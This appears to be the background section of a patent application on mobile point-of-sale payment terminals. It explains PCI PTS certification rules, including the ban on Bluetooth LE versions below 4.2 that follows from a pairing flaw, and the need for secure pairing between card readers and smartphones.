“Mobile point of sale” (mPOS) solutions have been developing very rapidly in recent years. These payment solutions generally use Bluetooth technology to associate a compact bankcard with a smartphone or tablet type of communications terminal for example.
Just as with classic card-based payment solutions, mPOS solutions are faced with security risks that have to be taken into account. The bankcard data (card number, date of expiry, three-digit cryptogram, etc.) or again the card-bearer's PIN code are all sensitive data that fraudulent individuals seek to retrieve by hacking into the information systems of the actors that process and store these pieces of data.
The PCI SSC (PCI Security Standards Council) is the body that issues security recommendations on card payments and, for this purpose, defines the PCI (Payment Card Industry) standards that must be complied with by all the actors concerned, especially banking institutions and merchants. The PCI SSC council has especially created the security standard for payment terminals, namely the PCI PTS (Payment Card Industry PIN Transaction Security) standard. PCI PTS is the security standard currently in force at the international level for payment terminals.
mPOS devices requiring the entry of the card-bearer's PIN code must therefore comply with a certain number of requirements defined by the PCI PTS standard in order to obtain certification from the PCI SSC council. These requirements relate more particularly to the physical and functional security of the payment terminals with PIN code entry. Since January 2015, the PCI PTS standard prohibits, for example, the use of the Bluetooth LE (low energy) or BLE standard for versions below 4.2 in mPOS devices. This prohibition stems from a safety flaw that has been detected in the pairing process for Bluetooth devices using BLE technology below the 4.2 version. Hence, to obtain certification from the PCI SSC authority, all new models of payment terminals presently supporting BLE technology use the 4.2 version.
In an mPOS payment system, therefore, the communications terminal, typically a Smartphone, must support the 4.2 version of the BLE standard. Now, this technology is as yet little used and the passage to BLE 4.2 on a Smartphone or its equivalent is possible only if the customer himself decides to do so.
Thus, a need exists today for an efficient and reliable solution to implementing an mPOS payment system that meets the requirements defined by the PCI PTS standard. In particular, no solution compliant with the PCI PTS standard today enables totally secured paring, in an mPOS system, between a peripheral device (possessing a card reader for example) and a communications terminal of the smartphone or tablet type for example.